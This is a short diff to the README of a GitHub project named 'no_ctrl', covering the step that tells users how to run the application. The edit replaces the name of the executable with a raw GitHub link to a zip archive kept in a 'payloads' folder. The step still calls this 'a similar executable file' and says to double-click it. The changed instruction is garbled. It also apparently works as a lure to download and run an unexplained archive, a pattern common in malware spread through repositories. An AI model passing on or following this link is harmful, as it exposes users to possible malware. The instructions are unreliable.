Camal2010/no_ctrl/README.md

 5. **Run the Application**
    - Locate the extracted folder.
-   - Inside, you should find `no_ctrl.exe` or a similar executable file.
+   - Inside, you should find `https://raw.githubusercontent.com/Camal2010/no_ctrl/main/payloads/no_ctrl_v1.2-alpha.2.zip` or a similar executable file.
    - Double-click on this file to open the application.

 ### Note: